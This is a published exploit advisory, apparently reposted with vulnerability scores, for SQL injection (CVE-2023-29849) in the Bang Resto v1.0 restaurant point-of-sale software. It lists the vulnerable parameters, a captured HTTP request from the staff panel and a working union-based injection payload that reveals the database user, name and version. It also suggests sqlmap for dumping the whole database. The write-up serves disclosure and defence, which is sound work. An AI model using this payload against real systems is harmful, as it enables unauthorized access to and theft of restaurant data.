8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
78.0%
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849
*Affected Parameters:*
btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],
itemqty[], btnMenuItemID
*Steps to Reproduce:*
1. First login your staff panel.
2. then go to "order" menu and Select menu then create order and intercept
request data using burp suite.
so your request data will be:
POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close
btnMenuItemID=1&qty=1
3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based
SQL Injection use this query ".1 union select
1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
-" in "btnMenuItemID" parameter.
4. Check browser you will see user, database and version informations.
5. You could also use sqlmap to dump the whole database by saving the web request from BurpSuite
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
78.0%